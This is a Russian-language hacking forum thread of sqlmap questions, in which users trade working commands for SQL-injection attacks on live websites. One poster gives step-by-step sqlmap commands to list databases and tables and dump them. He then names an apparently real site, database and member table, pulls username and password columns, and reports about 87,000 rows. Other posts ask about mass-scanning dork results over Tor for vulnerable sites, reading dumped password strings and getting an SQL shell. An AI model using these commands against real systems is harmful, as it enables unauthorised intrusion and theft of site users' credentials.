Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148

    --dbms=mysql --level 5
     
    ol1ver likes this.
  2. 0xrust

    0xrust New Member

    Joined:
    20 Apr 2013
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    можно еще --risk 3 добавить
     
  3. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    можно)
     
  4. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    как сделать дамп бд с сохранением структуры таблиц.
    Таблица 1 Таблица 2 Таблица 3
    11111111 222222222 333333333

    А не строчками,делаю дамп получается 11111111222222222333333333 - не очень удобно
     
  5. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Подскажите дамп открыл таблицу сразу а sqlmap перебирает по букве.Что я делаю не так?
    sqlmap -u http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs
     
  6. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    да
    А дампом могу только 50 к слить
     
  7. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Ну так дорка у меня такая и есть без id
    http://www.site.ru/showbanner.php?banner_id=' and [t] and '1'='1 --dbs
    просто кавычка
     
  8. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    Пробуй так!

    sqlmap -u www.site.ru/showbanner.php?banner_id=X --dbs --no-cast

    где X - тот id, к которому ты сначала тыкал свою каывчку, больше ничего не надо, map сам всё подберёт!

    Но учти, после этой команды ты лишь узнаешь кол-во и имена БД...


    Далее узнаёшь кол-во и имена таблиц в нужной БД:

    sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y --tables --no-cast

    где Y - имя нужной БД.


    После дампишь нужную тебе таблицу:

    sqlmap -u www.site.ru/showbanner.php?banner_id=X -D Y -T Z --dump --no-cast

    где Z - имя нужной таблицы

    Иногда, если извлекается очень медленно, можно добавить ключ --threads 10 , например - те увеличить кол-во потоков.
     
    #108 erwerr2321, 20 Jan 2016
    Last edited: 20 Jan 2016
    Ruslan1993it likes this.
  9. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    C:\sqlmap.pyc sqlmap.pyc -u http://www.site.ru/showbanner.php?banner_id= -D sokulec_dev -T soku_member_14July2015 -C contact_email,password --dump Тоже самое.А таблицу я взял с дампера
     
  10. ruslan0477

    ruslan0477 New Member

    Joined:
    6 Dec 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    [17:58:04] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

    Что бы это значило?
     
  11. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    sqlmap -u www.sokule.com/showbanner.php?banner_id=1 -D sokulec_dev -T soku_member_14July2015 --dump -C username,password --no-cast --threads 10

    Всё там нормально извлекается, не морочь голову...
     
  12. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    --level 5 --risk 3
     
  13. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148

    the SQL query used returns 86951 entries

    Чтобы не быть голословным...



    Ты спорить взялся, или совета просишь!?
    Причём здесь твоя дорка? Не пойму никак...
    Ну да ладно, всё получилось, все молодцы! :)
     
    #113 erwerr2321, 20 Jan 2016
    Last edited: 20 Jan 2016
  14. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    Как вытащить первые 10 записей из дампа?
     
  15. chatanti

    chatanti Member

    Joined:
    13 Jul 2011
    Messages:
    30
    Likes Received:
    16
    Reputations:
    0
    коллеги, подскажие какой-нибудь софт для первичного анализа выдачи по доркам. Запускаю под тором sqlmap, начинаю с N-й страницы выдачи, ставлю на ночь - все равно мало сайтов хекается. Хотелось бы софтинку, которой дорк задаешь, она чекает за минуту пару сотен сайтов и выдает, допустим 20 уязвимых. Потом скармливаешь это sqlmap по списку. Кто что использует? Проблема большинства программ в том, что гугл выплевывать капчу начинает через через какое-то время. Есть может у кого-то софт который через какой-нибудь duckduckgo работает?
     
  16. Galahem

    Galahem New Member

    Joined:
    12 Jul 2011
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    limit 10,0
     
  17. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    --stop=10
     
    _________________________
  18. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    уважаемые, вопрос. была уязвимостьь, ее прикрыли ну или по текущй ссылке она уже не доступна, поднял проверку до лвл 5 риск 3, нашел уязвимость пишет что таблица не достуна, что-то можно сделать?
     
  19. octer

    octer New Member

    Joined:
    4 Feb 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. Бывает когда делаю дамп таблицы с паролями вместо паролей непонятные строки (наверное в какой-то кодировке) вот пример:

    \x9dęś\x8b\x0f§$(éę\x86ťšŻĹë
    ´Ë\x8cž\x04,ŹĆR|^\x85Ľ^\x14v
    \x02Ő6N\x8důž@ůĺIžN\rN]

    Кто-нибудь сталкивался? Как узнать нормальный пароль?
     
  20. magichead

    magichead New Member

    Joined:
    9 Feb 2016
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    --sql-shell как его залить?